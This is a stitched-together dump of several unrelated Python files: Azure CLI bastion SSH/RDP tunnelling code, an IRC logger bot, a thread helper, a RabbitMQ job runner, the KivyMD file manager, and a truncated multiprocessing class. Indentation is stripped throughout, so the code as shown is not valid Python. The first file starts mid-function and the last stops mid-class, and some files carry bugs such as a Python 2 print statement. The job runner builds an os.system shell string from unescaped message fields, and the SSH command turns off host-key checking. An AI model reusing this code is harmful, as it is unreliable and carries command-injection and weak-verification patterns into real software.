system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
import os
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
azssh_utils = _get_azext_module(SSH_EXTENSION_NAME, SSH_UTILS_EXTENSION_MODULE)
cert_folder = tempfile.mkdtemp(prefix="aadsshcert")
if not os.path.isdir(cert_folder):
os.makedirs(cert_folder)
azssh.ssh_cert(cmd, cert_path=os.path.join(cert_folder, "id_rsa.pub-aadcert.pub"))
private_key_file = os.path.join(cert_folder, "id_rsa")
cert_file = os.path.join(cert_folder, "id_rsa.pub-aadcert.pub")
username = azssh_utils.get_ssh_cert_principals(cert_file)[0]
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
bot.py
|
import ssl
import logging
from threading import Thread
from irc.client import NickMask
from irc.connection import Factory
from irc.bot import SingleServerIRCBot, ExponentialBackoff
from irclogger.channel import Channel
log = logging.getLogger("irc-logger")
RECONNECT_TIMEOUT = 10
def handle_client(bot, f):
while True:
data = f.read()
if not data:
break
lines = data.splitlines()
for line in lines:
bot.say(line)
def channel_reader(bot):
while True:
with bot.log_channel.open() as f:
handle_client(bot, f)
class Bot(SingleServerIRCBot):
def __init__(self, host, port, channel, name):
if channel[0] != '#':
channel = "#" + channel
super(Bot, self).__init__([(host, port)], name, name,
recon=ExponentialBackoff(min_interval=RECONNECT_TIMEOUT, max_interval=2*RECONNECT_TIMEOUT),
connect_factory=Factory(wrapper=ssl.wrap_socket))
self.name = name
self.channel = channel
self.log_channel = Channel(self.name)
@property
def server_host(self):
return self.server_list[0].host
@property
def server_port(self):
return self.server_list[0].port
def say(self, fmt, *args, **kwargs):
self.connection.privmsg(self.channel, fmt.format(*args, **kwargs))
def on_welcome(self, _, event):
log.info('connected to %s, joining %s...', self.server_host, self.channel)
self.connection.join(self.channel)
def on_join(self, _, event):
nm = NickMask(event.source)
if nm.nick == self.name:
log.info('joined %s', self.channel)
self.log_channel.create()
thread = Thread(target=channel_reader, args=(self,))
thread.setDaemon(True)
thread.start()
def on_disconnect(self, _, event):
log.info('disconnected from %s', self.server_host)
self.log_channel.remove()
|
imthread.py
|
import threading, time
t_index = 0
class multi_threading():
def __init__(self, processing_func, max_threads=10):
assert type(max_threads) == int, 'max_threads value should be an integer'
assert max_threads >0, 'max_threads value cannot be less than 1'
self.process = processing_func
if max_threads == 1:
self.max_threads = max_threads
else:
self.max_threads = max_threads -1
self.threads_ended = False
self.stop_execution = False
def start(self, data):
if type(data) == int:
pseudo_infinity = data
else:
pseudo_infinity = len(data)
index_processed_data = {}
def process_frames(data):
global t_index
#do some processing stuff============================
self.threads_ended = False #informing new thread has started
t_index = data[0]+1
#handling threads which are asked to stop but are still running
if self.stop_execution:
return None
try:
processed_data = self.process(data[1]) #actually processing the data
except Exception as e:
processed_data = None
if str(e) == 'stop': #if manually stop exception raised
if not self.stop_execution:
self.stop_execution = True
print('Exception: Stop All Threads')
else:
print(e)
finally:
#adding processed data to a list=====================
index_processed_data.update({data[0]:processed_data})
#====================================================
#only setting thread ended to True when the last of
#maximum number of threads has finished
if data[0]%self.max_threads == 0:
self.threads_ended = True
#====================================================
threads = []
for i in range(0, pseudo_infinity):
# creating threads=================================================
try:
index_data = data[i]
except Exception:
index_data = i
args = (i,index_data)
t = threading.Thread(target=process_frames, name='t', args=(args,))
#==================================================================
# starting threads=================================================
if self.stop_execution:
break
threads.append(t)
t.daemon = True
t.start()
#checking if max number of threads has been created
if i%self.max_threads == 0:
#checking if threads has finished
if not i == 0: #skipping first batch
while self.threads_ended == False:
if self.stop_execution:
break
pass
#==================================================================
#waiting for all the
#threads to finish
for t in threads:
if self.stop_execution:
break
t.join()
#=====================================
#sorting in the order the data was received====
index = sorted(index_processed_data.keys())
sorted_data = []
for i in range(0, len(index)):
#print(processed_frames[i])
try:
sorted_data.append(index_processed_data[i])
except Exception as e:
print(e)
#==============================================
return sorted_data
def console_log(output=False):
global t_index
data = t_index
if output:
print(f'>> Creating Threads {data}')
return data
|
cmd_runner_rabbit.py
|
# Build and run the executable as part of a rabbit runner.
import sys
import pika
import json
import os
import shutil
import logging
import threading
import base64
import zipfile
import tempfile
def check_log_file_for_fatal_errors(lines):
'''Return true if the log file contains a fatal error that means we should
not be re-running this. Falls otherwise.
'''
# Look for a file access error. If that is found, then assume that is a good
# file and we just are having a network problem. So re-submit.
# todo: this is a fatal error for now
# if any(l for l in lines if "[3011] Unable to open" in l):
# return False
# If we are here, we don't know what caused this. Assume it is really bad and return true.
return True
def process_message(xrootd_node, ch, method, properties, body, connection):
'''
Process each message and run the C++ for it.
Arguments:
xrootd_node xrootd server to store results on
ch rabbit mq channel
method rabbit mq method
properties rabbit mq properties
body body of the incoming message (json)
connection rabbit mq connection
'''
# Make sure nothing from the previous job is sitting there waiting.
if os.path.exists('/home/atlas/rel'):
shutil.rmtree('/home/atlas/rel')
# Unpack the incoming message.
r = json.loads(body)
hash = r['hash']
code_hash = r['hash_source']
main_script = r['main_script']
input_files = r['files']
output_file = r['output_file']
xrootd_file = "root://" + xrootd_node + "//" + output_file
logging.info('We are looking at an xrootd file: ' + xrootd_file)
source_files = r['file_data']
# Unpack the source files we are going to run against
zip_filename = os.path.join(tempfile.gettempdir(), code_hash + '.zip')
with open(zip_filename, 'wb') as zip_data:
zip_data.write(base64.b64decode(source_files))
zip_data.close()
logging.info('Length of binary data we got: ' + str(len(source_files)))
zip_output = os.path.join(tempfile.gettempdir(), code_hash + '_files')
if not os.path.exists(zip_output):
os.mkdir(zip_output)
with zipfile.ZipFile(zip_filename, 'r') as zip_ref:
zip_ref.extractall(zip_output)
# Write the file list that we are to process
with open('filelist.txt', 'w') as f:
for f_name in input_files:
f.write(f_name + '\n')
log_file = os.path.join(tempfile.gettempdir(), code_hash + '.log')
# Now run the thing.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'running'})))
rtn_code = os.system('set -o pipefail; sh ' + zip_output + '/' + main_script + " " + xrootd_file + ' 2>&1 | tee ' + log_file)
logging.info('Return code from run: ' + str(rtn_code))
retry_message = False
if rtn_code != 0:
# First, do we need to re-try this crash or ont?
with open(log_file) as f:
content = f.read().splitlines()
# Log the error message.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='crashed_request',
body=json.dumps({'hash': hash, 'message': 'while building and running xAOD', 'log': content})))
# If it is fatal, then we move this job to crashed
is_fatal = check_log_file_for_fatal_errors(content)
if is_fatal:
# Report the error and the log file.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'crashed'})))
else:
# We want the put the message back on the queue and have someone else try it out.
retry_message = True
else:
# Update the status, and send the file on for use by the person that requested it.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'done'})))
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_add_file', body=json.dumps({'hash': hash, 'file': output_file, 'treename': r['treename']})))
# This is as far as we go.
if retry_message:
connection.add_callback_threadsafe(lambda: ch.basic_reject(delivery_tag=method.delivery_tag, requeue=True))
else:
connection.add_callback_threadsafe(lambda: ch.basic_ack(delivery_tag=method.delivery_tag))
def start_message_processing_thread(xrootd_node, ch, method, properties, body, connection):
''' Starts a message processing in a new thread.
This is so the msg recv loop doesn't need to remain busy.
'''
logging.debug('Firing off a thread processing.')
t = threading.Thread(target=process_message, args=(xrootd_node, ch, method, properties, body, connection))
t.start()
logging.debug('done loading the thread up.')
def listen_to_queue(rabbit_node, xrootd_node, rabbit_user, rabbit_pass):
'Get the various things downloaded and running'
# Connect and setup the queues we will listen to and push once we've done.
if rabbit_pass in os.environ:
rabbit_pass = os.environ[rabbit_pass]
credentials = pika.PlainCredentials(rabbit_user, rabbit_pass)
connection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbit_node, credentials=credentials))
channel = connection.channel()
# We run pretty slowly, so make sure this guy doesn't keep too many.
channel.basic_qos(prefetch_count=1)
# We pull tasks off this guy.
channel.queue_declare(queue='run_cpp')
# Let them know about progress
channel.queue_declare(queue='status_change_state')
# Add files as they complete
channel.queue_declare(queue='status_add_file')
# Record a crash
channel.queue_declare(queue='crashed_request')
# Listen for work to show up.
channel.basic_consume(queue='run_cpp', on_message_callback=lambda ch, method, properties, body: start_message_processing_thread(xrootd_node, ch, method, properties, body, connection), auto_ack=False)
# We are setup. Off we go. We'll never come back.
channel.start_consuming()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
bad_args = len(sys.argv) != 5
if bad_args:
print "Usage: python cmd_runner_rabbit.py <rabbit-mq-node-address> <xrootd-results_node> <rabbit-username> <rabbit-password>"
else:
listen_to_queue(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
|
filemanager.py
|
"""
Components/File Manager
=======================
A simple manager for selecting directories and files.
Usage
-----
.. code-block:: python
path = '/' # path to the directory that will be opened in the file manager
file_manager = MDFileManager(
exit_manager=self.exit_manager, # function called when the user reaches directory tree root
select_path=self.select_path, # function called when selecting a file/directory
)
file_manager.show(path)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/file-manager.png
:align: center
Or with ``previous`` mode:
.. code-block:: python
file_manager = MDFileManager(
exit_manager=self.exit_manager,
select_path=self.select_path,
previous=True,
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/file-manager-previous.png
:align: center
Example
-------
.. code-block:: python
from kivy.core.window import Window
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.filemanager import MDFileManager
from kivymd.toast import toast
KV = '''
BoxLayout:
orientation: 'vertical'
MDToolbar:
title: "MDFileManager"
left_action_items: [['menu', lambda x: None]]
elevation: 10
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
'''
class Example(MDApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.file_manager = MDFileManager(
exit_manager=self.exit_manager,
select_path=self.select_path,
previous=True,
)
def build(self):
return Builder.load_string(KV)
def file_manager_open(self):
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager_open = False
self.file_manager.close()
def events(self, instance, keyboard, keycode, text, modifiers):
'''Called when buttons are pressed on the mobile device.'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
__all__ = ("MDFileManager",)
import os
import threading
from kivy.app import App
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.properties import (
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import AsyncImage
from kivy.uix.modalview import ModalView
from PIL import Image
from kivymd import images_path
from kivymd.theming import ThemableBehavior
from kivymd.toast import toast
from kivymd.uix.floatlayout import MDFloatLayout
from kivymd.uix.list import BaseListItem, ContainerSupport
ACTIVITY_MANAGER = """
#:import os os
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconLeftWidget:
icon: root.icon
theme_text_color: "Custom"
text_color: self.theme_cls.primary_color
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
MDGridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols * self.spacing[0]) / self.cols
row_force_default: True
adaptive_height: True
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_box_1, root.paths, 1)
on_release: root.events_callback(os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text: os.path.split(root.paths[0])[1].replace('thumb_', '') if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_2, root.paths, 2)
on_release: root.events_callback(os.path.join(root.path, label_2.text))
LabelContent:
id: label_2
text: os.path.split(root.paths[1])[1].replace('thumb_', '') if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_3, root.paths, 3)
on_release: root.events_callback(os.path.join(root.path, label_3.text))
LabelContent:
id: label_3
text: os.path.split(root.paths[2])[1].replace('thumb_', '') if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size:dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
md_bg_color: root.theme_cls.bg_normal
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root._update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height / 2 - self.height / 2
size: dp(48), dp(48)
"""
class IconButton(ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedOneLineIconListItem(ContainerSupport, BaseListItem):
_txt_left_pad = NumericProperty("72dp")
_txt_top_pad = NumericProperty("16dp")
_txt_bot_pad = NumericProperty("15dp")
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class BodyManagerWithPrevious(BoxLayout):
def get_source(self, source_type, instance_label, paths, index):
if source_type == "folder" and instance_label.text != "":
source = self.icon_folder
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f"{images_path}transparent.png"
return source
class MDFileManager(ThemableBehavior, MDFloatLayout):
icon = StringProperty("check")
"""
The icon that will be used on the directory selection button.
:attr:`icon` is an :class:`~kivy.properties.StringProperty`
and defaults to `check`.
"""
icon_folder = StringProperty(f"{images_path}folder.png")
"""
The icon that will be used for folder icons when using ``previous = True``.
:attr:`icon` is an :class:`~kivy.properties.StringProperty`
and defaults to `check`.
"""
exit_manager = ObjectProperty(lambda x: None)
"""
Function called when the user reaches directory tree root.
:attr:`exit_manager` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `lambda x: None`.
"""
select_path = ObjectProperty(lambda x: None)
"""
Function, called when selecting a file/directory.
:attr:`select_path` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `lambda x: None`.
"""
ext = ListProperty()
"""
List of file extensions to be displayed
in the manager. For example, `['py', 'kv']` - will filter out all files,
except python scripts and Kv Language.
:attr:`ext` is an :class:`~kivy.properties.ListProperty`
and defaults to `[]`.
"""
search = OptionProperty("all", options=["all", "files"])
"""
It can take the values 'dirs' 'files' - display only directories
or only files. By default, it displays and folders, and files.
Available options are: `'all'`, `'files'`.
:attr:`search` is an :class:`~kivy.properties.OptionProperty`
and defaults to `all`.
"""
current_path = StringProperty(os.getcwd())
"""
Current directory.
:attr:`current_path` is an :class:`~kivy.properties.StringProperty`
and defaults to `/`.
"""
use_access = BooleanProperty(True)
"""
Show access to files and directories.
:attr:`use_access` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
previous = BooleanProperty(False)
"""
Shows only image previews.
:attr:`previous` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
_window_manager = None
_window_manager_open = False
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
# If False - do not add a directory to the history -
# The user moves down the tree.
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = "Subtitle1"
self.ext = [".png", ".jpg", ".jpeg"]
self.app = App.get_running_app()
if not os.path.exists(os.path.join(self.app.user_data_dir, "thumb")):
os.mkdir(os.path.join(self.app.user_data_dir, "thumb"))
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon,
)
self.add_widget(action_button)
def show(self, path):
"""Forms the body of a directory tree.
:param path: The path to the directory that will be opened in the file manager.
"""
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self._create_previous, args=(path,)).start()
split_dirs = self._split_list(dirs, 3)
split_files = self._split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []: # selected directory
pass
elif not dirs and not files: # directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"icon_folder": self.icon_folder,
"paths": list_dirs,
"type": "folder",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
for list_files in list(split_files):
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"icon_folder": self.icon_folder,
"paths": list_files,
"type": "files",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
else:
for name in dirs:
_path = path + name if path == "/" else path + "/" + name
access_string = self.get_access_string(_path)
if "r" not in access_string:
icon = "folder-lock"
else:
icon = "folder"
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": icon,
"dir_or_file_name": name,
"events_callback": self.select_dir_or_file,
}
)
for name in files:
_path = path + name if path == "/" else path + "/" + name
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": "file-outline",
"dir_or_file_name": name,
"events_callback": self.select_dir_or_file,
}
)
self.ids.rv.data = manager_list
if not self._window_manager:
self._window_manager = ModalView(
size_hint=(1, 1), auto_dismiss=False
)
self._window_manager.add_widget(self)
if not self._window_manager_open:
self._window_manager.open()
self._window_manager_open = True
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != "":
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ""
if self.use_access:
access_data = {"r": os.R_OK, "w": os.W_OK, "x": os.X_OK}
for access in access_data.keys():
access_string += (
access if os.access(path, access_data[access]) else "-"
)
return access_string
def get_content(self, path):
"""Returns a list of the type [[Folder List], [file list]]."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir(os.path.join(path, content)):
if self.search == "all" or self.search == "dirs":
dirs.append(content)
else:
if self.search == "all" or self.search == "files":
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append(
os.path.join(
self.app.user_data_dir,
"thumb",
f"thumb_{content}",
)
)
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def close(self):
"""Closes the file manager window."""
self._window_manager.dismiss()
self._window_manager_open = False
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Returning to the branch down in the directory tree."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == "":
self.close()
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
"""Called when a click on a floating button."""
self.select_path(self.current_path)
def _update_list_images(self):
self.ids.rv.refresh_from_layout()
def _split_list(self, lst, n):
if lst:
n = max(1, n)
return (lst[i : i + n] for i in range(0, len(lst), n))
else:
return []
def _create_previous(self, path):
if "r" not in self.get_access_string(path):
toast("PermissionError")
return
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = os.path.join(
self.app.user_data_dir, "thumb", f"thumb_{image}"
)
if not os.path.exists(path_to_thumb):
im = Image.open(_path)
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
Builder.load_string(ACTIVITY_MANAGER)
|
AsyncProcessing.py
|
import multiprocessing
import os
_lastMultiProcessId = -1 # Start of our initial id
class MultiProcess():
"""Initiates a single process using a unique id
as a distinguisher and the target is the function
being called.
"""
def __init__(self, Id: int = 0):
"""Initiates a Multiprocess object to support an async
function.
Usage:
----
MultiProcess(int: Id, target = function or None)
"""
# Lets check for an available ID
if Id == _lastMultiProcessId or _lastMultiProcessId == -1:
Id = _lastMultiProcessId + 1
_lastMultiProcessId = Id
self._Id = Id
self.target = None
self.process: multiprocessing.Process = None
def run(self, targetFunction = None):
"""Will run the target process if the target
function exists.
"""
if targetFunction is None:
print("Cannot run a process without a target process to use.")
return
self.target = targetFunction
process = multiprocessing.Process(target = targetFunction)
self.process = process
print("Starting " + targetFunction)
process.start()
return
def stop(self):
"""Will stop the process if the process still exists"""
if self.process is None:
print("Cannot stop a process that doesn't exist.")
return
print("Stopping " + self.target)
self.process.terminate()
if self.process.is_alive() == False:
self.process.close()
self.process = None
return
@property
def get_id(self):
"""Returns the ID that was set during initialization"""
return self._Id
class ProcessContainer():
